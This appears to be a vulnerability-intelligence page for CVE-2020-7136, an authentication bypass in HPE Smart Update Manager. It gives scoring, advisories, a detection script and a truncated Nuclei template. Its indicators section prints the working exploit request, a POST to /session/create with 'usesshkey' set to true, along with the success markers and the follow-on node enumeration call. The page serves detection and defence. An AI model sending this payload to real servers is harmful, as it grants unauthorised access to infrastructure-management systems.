CVE-2020-7136
Published 2020-04-30

Priority P1 (90), critical, CVSS 3.1 base score 9.8
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploited in the wild (ITW); public exploit available; listed in VulnCheck KEV
EPSS: 79.52% (99.6th percentile)
A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hewlett_packard_enterprise | smart_update_manager | — | — |
| hpe | smart_update_manager | < 8.5.6 | 8.5.6 |
Detection & IOCs (extracted from sources)

Exploit request body (command IoC):

```json
{
  "hapi": {
    "username": "Administrator",
    "password": "any_password",
    "language": "en",
    "mode": "gui",
    "usesshkey": true,
    "privatekey": "any_privateky",
    "passphrase": "any_passphase",
    "settings": {
      "output_filter": "passed",
      "port_number": "444"
    }
  }
}
```
- Detect exploitation attempts by monitoring POST requests to /session/create with a JSON body containing 'usesshkey':true; this is the auth-bypass trigger, using an SSH-key flag to skip password validation.
- A successful exploit response contains all three strings in the body: 'hmessage', 'Command completed successfully.', and 'node_name'. Match all three (AND condition) to confirm exploitation.
- After session creation, attackers follow up with GET /session/<sessionid>/node/index to enumerate nodes. Monitor for this pattern with a valid sessionId extracted from a prior /session/create response.
- The sessionId format used in follow-on requests matches the regex pattern '[a-z0-9.]+'; use this to identify active sessions created via the bypass.
- The Content-Type header is application/json on the exploit POST; combine it with the /session/create path and the usesshkey field in the body for a high-fidelity detection rule.
- The exploit payload uses 'usesshkey':true with arbitrary/dummy values for privatekey and passphrase, indicating the vulnerability is an authentication bypass (CWE-288) that does not actually validate SSH key material: any value triggers the bypass.
- The vulnerability affects HPE Smart Update Manager (SUM) versions strictly prior to 8.5.6; version 8.5.6 and later are not affected.
- The exploit targets port 444 as specified in the settings payload. HPE SUM may be running on a non-standard HTTPS port; ensure network monitoring covers port 444.
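The detection notes above can be combined into one rule. The following is an added example written for this page, not code from any of the listed sources: it walks request/response records in order, flags JSON POSTs to /session/create whose hapi.usesshkey flag is set, confirms success only when all three response markers are present, and then flags any GET /session/<id>/node/index that reuses a session id minted through the bypass. The record shape and the assumption that the success response carries a "sessionId" field are mine; the sample traffic is constructed.

```python
"""Detection logic for the CVE-2020-7136 auth-bypass pattern described above.
Added example; not from the page's sources. Input records are constructed."""
import json
import re
from typing import Optional

# Markers the detection notes require in a successful bypass response (AND).
SUCCESS_MARKERS = ("hmessage", "Command completed successfully.", "node_name")
# Follow-on node enumeration path; the session id segment matches [a-z0-9.]+.
NODE_INDEX_RE = re.compile(r"^/session/([a-z0-9.]+)/node/index$")


def _header(req: dict, name: str) -> str:
    """Case-insensitive header lookup; returns '' when the header is absent."""
    for key, value in req.get("headers", {}).items():
        if key.lower() == name.lower():
            return value
    return ""


def is_bypass_attempt(req: dict) -> bool:
    """True for a JSON POST to /session/create whose hapi.usesshkey flag is true."""
    if req.get("method") != "POST" or req.get("path") != "/session/create":
        return False
    if "application/json" not in _header(req, "Content-Type").lower():
        return False
    try:
        payload = json.loads(req.get("body", ""))
    except ValueError:
        return False  # not JSON, so it cannot carry the flag the way the exploit does
    hapi = payload.get("hapi") if isinstance(payload, dict) else None
    return isinstance(hapi, dict) and hapi.get("usesshkey") is True


def is_successful_bypass_response(body: str) -> bool:
    """All three markers must be present, per the detection note above."""
    return all(marker in body for marker in SUCCESS_MARKERS)


def session_id_from_response(body: str) -> Optional[str]:
    """Assumption (not from the page): the success response is JSON with a
    'sessionId' field. Only ids matching the documented [a-z0-9.]+ shape count."""
    try:
        data = json.loads(body)
    except ValueError:
        return None
    sid = data.get("sessionId") if isinstance(data, dict) else None
    if isinstance(sid, str) and re.fullmatch(r"[a-z0-9.]+", sid):
        return sid
    return None


def scan(records: list) -> list:
    """Walk request/response records in order and return (index, kind, session_id) alerts.
    Record shape (constructed): method, path, headers, body, response_body."""
    alerts = []
    bypass_sessions = set()  # session ids minted via the bypass
    for i, rec in enumerate(records):
        if is_bypass_attempt(rec):
            resp = rec.get("response_body", "")
            if is_successful_bypass_response(resp):
                sid = session_id_from_response(resp)
                if sid:
                    bypass_sessions.add(sid)
                alerts.append((i, "bypass_success", sid))
            else:
                alerts.append((i, "bypass_attempt", None))
            continue
        m = NODE_INDEX_RE.match(rec.get("path", "")) if rec.get("method") == "GET" else None
        if m and m.group(1) in bypass_sessions:
            alerts.append((i, "post_bypass_enumeration", m.group(1)))
    return alerts


# Constructed sample traffic: a normal password login, the bypass, its follow-on
# enumeration, a legitimate session's enumeration, and a failed bypass attempt.
SAMPLE_RECORDS = [
    {"method": "POST", "path": "/session/create",
     "headers": {"Content-Type": "application/json"},
     "body": '{"hapi":{"username":"admin","password":"s3cret","usesshkey":false}}',
     "response_body": '{"hmessage":"Command completed successfully.","sessionId":"a1b2.c3","node_name":"n1"}'},
    {"method": "POST", "path": "/session/create",
     "headers": {"content-type": "application/json; charset=utf-8"},
     "body": '{"hapi":{"username":"Administrator","password":"any_password","usesshkey":true,'
             '"privatekey":"x","passphrase":"y","settings":{"port_number":"444"}}}',
     "response_body": '{"hmessage":"Command completed successfully.","sessionId":"zz9.q8","node_name":"n1"}'},
    {"method": "GET", "path": "/session/zz9.q8/node/index", "headers": {}, "body": "", "response_body": ""},
    {"method": "GET", "path": "/session/a1b2.c3/node/index", "headers": {}, "body": "", "response_body": ""},
    {"method": "POST", "path": "/session/create",
     "headers": {"Content-Type": "application/json"},
     "body": '{"hapi":{"usesshkey":true}}',
     "response_body": '{"hmessage":"Authentication failed"}'},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_RECORDS):
        print(alert)
```

The password login and its later node enumeration produce no alert, the bypass yields a bypass_success alert followed by a post_bypass_enumeration alert for the same session id, and the failed attempt is still surfaced as bypass_attempt, since the flag alone is the trigger regardless of outcome.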
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| VulnCheck | n/a | 9.8 | CRITICAL | n/a |
GHSA

GHSA-jp2q-w73p-9cf9 (ghsa_unreviewed, 2022-05-24), severity HIGH
Title: A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8
Description: identical to the advisory text above.
VulnCheck

HPE Smart Update Manager (SUM) Remote Unauthorized Access Vulnerability (vulncheck, 2020, CVSS 9.8, CRITICAL)
Description: identical to the advisory text above.
Affected: hpe smart_update_manager
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploita
No detection rules found.
Nuclei

HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access (nuclei, CVSS 9.8, CRITICAL)
HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.

Template:

```yaml
id: CVE-2020-7136
info:
  name: HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access
  author: gy741
  severity: critical
  description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.
  impact: |
    An attacker can gain unauthorized access to the HPE Smart Update Manager, potentially leading to further compromise of the system.
  remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest ve
```
No writeups or analysis indexed.